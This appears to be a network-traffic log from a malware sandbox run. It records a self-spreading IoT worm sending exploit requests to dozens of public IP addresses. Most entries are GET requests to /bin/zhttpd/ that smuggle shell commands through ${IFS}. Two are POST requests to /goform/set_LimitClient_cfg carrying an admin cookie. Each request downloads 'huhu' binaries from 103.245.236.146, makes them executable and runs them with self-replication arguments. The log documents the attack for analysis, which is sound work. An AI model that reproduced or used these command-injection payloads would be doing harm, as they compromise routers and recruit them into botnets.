                                                  Jan 19, 2024 18:24:15.461572886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9350192.168.2.135134653.230.101.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461625099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9351192.168.2.1338718205.143.162.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461673975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9352192.168.2.135728649.124.239.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461699009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9353192.168.2.135210873.123.34.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461736917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9354192.168.2.134187012.25.147.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461792946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9355192.168.2.1339978209.163.38.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461819887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9356192.168.2.133382886.180.81.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461853027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9357192.168.2.133660897.92.87.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461878061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9358192.168.2.1340854125.252.174.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461941957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9359192.168.2.1342592107.129.29.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.461971998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9360192.168.2.135972640.181.164.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462018013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9361192.168.2.1351890183.113.155.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462049007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9362192.168.2.134256479.34.212.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462101936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9363192.168.2.135592678.166.93.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462131977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9364192.168.2.1357202206.119.77.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462158918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9365192.168.2.135547470.9.225.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462218046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9366192.168.2.13445422.14.122.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462271929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9367192.168.2.1357176201.15.229.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462311029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9368192.168.2.1337906213.201.142.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462366104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9369192.168.2.1341576143.27.223.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462399960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9370192.168.2.1337852134.19.157.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462425947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9371192.168.2.135061614.100.121.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.462466002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9372192.168.2.1339158212.3.206.1688080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.355362892 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:17.038783073 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9373192.168.2.1351076219.220.250.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.470618010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9374192.168.2.13363825.126.187.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.470915079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9375192.168.2.1333688133.253.198.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.470948935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9376192.168.2.134151659.59.101.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.470992088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9377192.168.2.1344188203.28.240.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471014023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9378192.168.2.135115472.106.113.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471081972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9379192.168.2.1360070172.94.17.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471087933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9380192.168.2.134761837.61.205.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471129894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9381192.168.2.1348480140.133.214.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471169949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9382192.168.2.135176479.90.93.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471225977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9383192.168.2.1340304198.84.121.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471247911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9384192.168.2.133741663.252.56.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471317053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9385192.168.2.1348728222.60.190.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471400023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9386192.168.2.136037695.229.130.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471400976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9387192.168.2.133977695.77.109.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471450090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9388192.168.2.1343904137.0.183.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471452951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9389192.168.2.1338864216.96.86.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471453905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9390192.168.2.1360236138.51.117.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471474886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9391192.168.2.1344380132.226.216.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471496105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9392192.168.2.1334570125.115.200.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471499920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9393192.168.2.1346932211.10.157.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471523046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9394192.168.2.133295445.86.127.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471582890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9395192.168.2.1337976213.124.148.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471647024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9396192.168.2.1350776146.239.182.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471683979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9397192.168.2.1352904210.90.205.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471715927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9398192.168.2.135458468.236.54.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471775055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9399192.168.2.1355734131.83.48.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471793890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9400192.168.2.134800641.247.195.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471852064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9401192.168.2.1345278192.165.169.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471893072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9402192.168.2.134669241.184.182.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471935034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9403192.168.2.135929065.14.136.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.471986055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9404192.168.2.133484619.197.184.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472009897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9405192.168.2.1356244126.254.38.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472063065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9406192.168.2.1350662206.127.142.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472093105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9407192.168.2.1350998154.22.22.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:16.472138882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9408192.168.2.1358940155.244.173.25443
                                                  TimestampBytes transferredDirectionData
